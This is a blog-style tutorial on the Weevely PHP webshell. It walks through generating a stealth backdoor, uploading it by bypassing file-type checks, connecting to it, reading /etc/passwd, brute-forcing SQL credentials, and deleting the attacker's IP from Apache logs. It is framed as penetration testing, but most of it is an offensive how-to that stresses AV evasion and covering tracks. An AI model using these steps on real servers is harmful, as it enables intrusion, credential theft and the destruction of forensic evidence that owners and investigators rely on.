Weevely Tutorial – Basic to Advance PHP Webshell

Weevely is a stealth PHP web shell that is designed for remote server administration and penetration testing.

It simplifies the administration of your web account, especially with unprivileged accounts such as free hosting services and other shared environments. It is an essential tool for post exploitation tasks like privilege escalation and access maintained even in restricted environments, and can be used as stealth backdoor.

Features:

  • Ssh-like terminal
  • SQL console pivoted on target
  • HTTP proxy pivoted on target
  • Host configuration security auditing
  • Mount of the remote filesystem
  • Network scan pivoted on target
  • File upload and download
  • Reverse and direct TCP shell
  • Meterpreter support
  • Service account Bruteforce
  • Compressed archive management
The remote agent is a small PHP script which can extend its functionality over the network at run-time. The agent code is polymorphic and hardly detectable by AV and the traffic is obfuscated within the HTTP requests.
Weevely also provides python API to develop your own modules.

Weevely Installation

root@cybarrior:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade

root@cybarrior:~# apt-get install g++ python-pip libyaml-dev python-dev

Usage

weevely tutorial - php webshell

Generate a backdoor

root@ddos:~# weevely generate ddos ddos.php

Generated backdoor with password ‘ddos’ in ‘ddos.php’ of 1439 byte size.

root@ddos:/usr/share/weevely# ls

bd core ddos.php modules utils weevely.py

You need to use some technique for uploading webshell like double extension, bypass image type validation, bypass whitelist/blacklist. View here.

Connect to the backdoor

root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos

Bypass Policy to Read /etc/passwd

www-data@ddos:/etc $ audit_etcpasswd

Guess the SQL user credentials

This tip teaches you how to guess the credentials of multiple SQL users.

weevely> bruteforce_sql –help

Log cleanup

This skill to teach you how to clear the server in the tracking records.

We use the system_info command to find our own ip

www-data@ddos:/var/log $ system_info -info client_ip

We use the grep command to confirm that our ip records in the log file

www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”

we can see that the activities of our IP address have been recorded, we can again use grep to remove our log from the ip, and then save it to a temporary file

www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log

Let’s test to see if we’ve deleted it

Then we can replace cleaned.log to access.log.1

 

Leave a Reply

Your email address will not be published. Required fields are marked *